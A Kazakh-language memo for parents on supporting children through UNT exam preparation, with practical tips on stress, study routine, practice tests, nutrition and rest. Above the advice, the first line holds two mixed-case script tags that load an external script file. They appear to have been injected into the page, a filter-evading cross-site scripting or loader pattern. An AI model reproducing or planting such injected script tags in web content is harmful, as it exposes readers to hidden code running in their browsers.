<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
ТҮЛЕКТЕРДІҢ ҰБТ ДАЙЫНДЫҚТАРЫ БОЙЫНША АТА – АНАЛАРҒА ЖАДЫНАМА
Құпия емес, ҰБТ – ді сәтті тапсыру, көбінесе көңіл –күй мен ата – аналардың қатынасына байланысты. Балалардың емтиханға дайындықтарын жақсартуына көмектесу үшін, бірнеше кеңесті орындап көріңіз.
- Емтихан алдында баланың үрейін келтірмеңіз – ол тест нәтижесінде керісінше әсер береді. Бала жас ерекшеліктеріне байланысты өзінің эмоциясын бақылай алмағандықтан, ашулануы мүмкін
- Үйде оқуға деген ыңғайлы орынмен қамтыңыз, үйдегілер ешкім бөгет жасамайтынын қадағалаңыз.
- Балаға дайындық тақырыптарын күндер бойынша реттеуге көмектесіңіз.
- Баланы емтиханға дайындықтын әдістемесімен таныстыру. Пәндер бойынша тест тапсырмаларының әр түрлі нұсқауын дайындаңыз және баланы жаттықтырыңыз, өйткені тестілеу үйреншікті жазбамен ауызша емтиханнан ерекше.
- Тест тапсырмаларымен жаттығу кезінде, балаға уақыттың қолдануы мен реттеуін үйретіңіз. Егер бала сағат тақпаса, онда оған емтиханға барғанда міндетті түрде беріңіз.
- Баланың өзіне сенімділігін арттырып оны үнемі қолдаңыз.
- Баланың емтиханға дайындық тәртібін бақылаңыз, шамадан тыс жүктеуді болдырмаңыз.
- Баланың тамақтануына көңіл аударыңыз. Балық, ірімшік, өрік, жаңғақ және тағы басқа азық – түліктер мидың жұмыс жасауын ынталандырады.
- Емтихан таянған кезде балаға толық демалуды қамтыңыз, ол жақсы демалып ұйқысын қандырсын.
- Емтиханнан кейін баланы сынамаңыз.
Есте сақтаңыздар:
Бастысы – күш салу мен үрейді төмендету және оқу үшін қажетті жағдаймен қамту.